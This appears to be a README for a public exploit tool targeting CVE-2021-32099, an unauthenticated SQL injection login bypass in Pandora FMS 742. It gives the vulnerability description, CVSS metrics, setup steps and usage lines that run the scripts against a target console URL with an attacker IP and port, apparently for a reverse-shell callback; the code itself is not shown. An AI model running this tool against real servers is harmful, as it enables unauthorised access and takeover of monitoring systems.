PRIMARY CATEGORY → EXPLOITS

CVE-2021-32099 💥Pandora FMS

Attack Vector 🗡️Login Bypass via Unauthenticated SQL Injection

Affected Versions 🚨v7.0 NG 742

Severity 🚩Critical 9.8/10


Description

Reference

A SQL injection vulnerability in the pandora_console component of Artica Pandora FMS 742 allows an unauthenticated attacker to upgrade his unprivileged session via the /include/chart_generator.php session_id parameter, leading to a login bypass


CVSS Score

TL;DR → CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS Base MetricsValues
Attack Vector (AV)Network
Attack Complexity (AC)Low
Privileges Required (PR)None
User Interaction (UI)None
Scope (S)Unchanged
Confidentiality (C)High
Integrity (I)High
Availability (A)High

Setup

python3 -m venv ./venv
source ./venv/bin/activate
pip install -r ./requirements.txt

Usage

Help Display
  • Standard Version
python3 CVE-2021-32099.py --help
  • Extended Version
python3 CVE-2021-32099_extended.py --help
Script Execution
  • Standard Version
python3 CVE-2021-32099.py <PANDORA_CONSOLE_URL> <ATTACKER_IP> <ATTACKER_PORT>

Zoom In

  • Extended Version
python3 CVE-2021-32099_extended.py <PANDORA_CONSOLE_URL> <ATTACKER_IP> <ATTACKER_PORT>

Zoom In


Code

Reference


References

Reference I    •    Reference II    •    Reference III    •    Reference IV